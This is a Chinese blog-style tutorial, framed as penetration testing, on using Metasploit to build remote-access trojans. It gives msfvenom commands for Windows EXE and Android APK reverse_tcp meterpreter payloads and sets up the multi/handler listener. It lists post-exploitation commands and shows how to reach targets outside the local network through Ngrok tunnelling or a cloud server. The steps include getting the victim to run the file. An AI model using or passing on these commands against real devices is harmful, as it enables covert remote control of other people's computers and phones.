msf-木马渗透测试
msf-木马渗透测试
引言
msf(metasploit framework)是渗透测试的神器,其中很多好玩的功能,今天我来写一个msf基于木马的渗透 测试。
众所周知,渗透测试分为内网渗透和外网渗透
内网渗透
0x01环境部署
如果你有kali的话,直接在kali里面运行,kali系统集成了msf
如果没有的话用unbuntu或者centos来搭建也可以。
0x01.1安装干净的系统
1 | 1)安装软件 |
这一步可有可无,其实用安装了其他东西的也可以安装msf,但是有一定可能会报错。
0x01.2安装msf
1 | curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall |
0x02生成木马
0x02.1基于windos
在shelll执行这个命令,会在当前目录下生成一个名为muma.exe的windows系统exe木马程序,lhost绑定攻击者的ip地址,lport绑定攻击者接收会话的端口号。
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=(你的虚拟机的ip) LPORT=(随便一个端口号) -f exe -o muma.exe |
0x02.2基于Android
在shelll执行这个命令,会在当前目录下生成一个名为muma.apk的Android系统apk木马程序,lhost绑定攻击者的ip地址,lport绑定攻击者接收会话的端口号。
1 | msfvenom -p android/meterpreter/reverse_tcp LHOST=(你的虚拟机的ip) LPORT=(随便一个端口号) R>muma.apk |
由于安卓的手机没有最高权限,所以即使控制了手机也没有办法获得一些高级权限。
0x03利用msf攻击
将生成的文件传给目标电脑或者手机
然后在电脑终端输入msfconsole
打开msf。
输入use exploit/multi/handler
使用监听模块
输入set payload windows/meterpreter/reverse_tcp
设置tcp监听攻击载荷(windows)
或者输入set payload android/meterpreter/reverse_tcp
设置tcp监听攻击载荷(安卓)
输入set lhost (你上面设置的攻击者ip)
设置攻击者ip,与木马绑定的一致
输入set lport (上面输入的端口)
设置攻击者监听端口,与木马绑定的一致
最后show options
看一下设置有没成功
执行run
,开始监听端口
然后双击那个木马程序,于是我们就获得了电脑的控制权。
输入help可以查询常用的命令,这里只演示几个简单的。
几个简单的命令,由于我是在虚拟机上运行的widows10,虚拟机上面没有摄像头,所以没有成功。
下面是常用命令
1 | getuid 查看当前权限 |
安卓和windows差不多,这里就不在赘述了。
外网渗透
对于外网渗透,我们有两种办法,一种是基于kali或者其他linux虚拟机的内网渗透来进行外网渗透(更加方便快捷,很多功能都能实现,但是由于内网穿透的网速问题,提权可能更加慢),一种是用云服务器的外网渗透(提权更快,处理数据更加快捷,但是由于没有图形化界面,实时监控不太能做到)
0x01内网穿透
0x01.1内网穿透工具
我用的是Sunny-Ngrok内网穿透服务。
这个工具是我从学习的时候用的,还是好用,但是居然要实名认证什么的,其实实名也没啥,但是为啥还要收两块钱的认证费用,∑( 口 ||,太无语了,其他的还行
然后教程继续
先去注册一个账号,然后完成实名认证(这点就不需要教了)
然后去隧道管理,买一个免费的就可以了
然后添加一些基本信息
然后就注册成功了
将下载的文件在虚拟机里面解压,然后进入文件夹运行文件
内网穿透就做好了。
0x01.2渗透测试
其实剩下来的步骤和内网渗透都差不多了,只是需要将生成木马的代码改为
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=(给你分配的域名) LPORT=(给你分配的端口) -f exe -o muma.exe |
剩下的按照内网渗透做就可以了。
0x02云服务器
云服务器的话也是需要搭建msf的,和环境部署的方法一样,忘了的翻上去看。
这里和内网渗透不一样的也就是在生成木马和操作位置了。
0x02.1生成木马
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=(你的公网IP) LPORT=(服务器开放的一个端口) -f exe -o muma.exe |
这里需要用ssh连接工具连接上云服务器,执行该命令成功创建windows木马程序。
然后用ftp软件去将文件下载下来
然后后面不同的就是链接时设置的端口了
输入use exploit/multi/handler
使用监听模块
输入set payload windows/meterpreter/reverse_tcp
设置tcp监听攻击载荷
输入set lhost 0.0.0.0
设置攻击者ip,这里直接0.0.0.0就行
输入set lport (前面你设置的开放端口)
设置攻击者监听ip,与木马绑定的一致
最后show options 看一下设置有没成功
执行run,开始监听端口.
然后后面就一样了
结束。
Tips:
在复现的时候发现,找不到msfconsole这个选项,可能是没有放到环境变量里面去,找了一些资料才找到了msf文件在哪。
adduser msf #添加msf用户
su msf #切换到msf用户
cd /opt/metasploit-framework/bin #切换到msf所在的目录
./msfconsole
help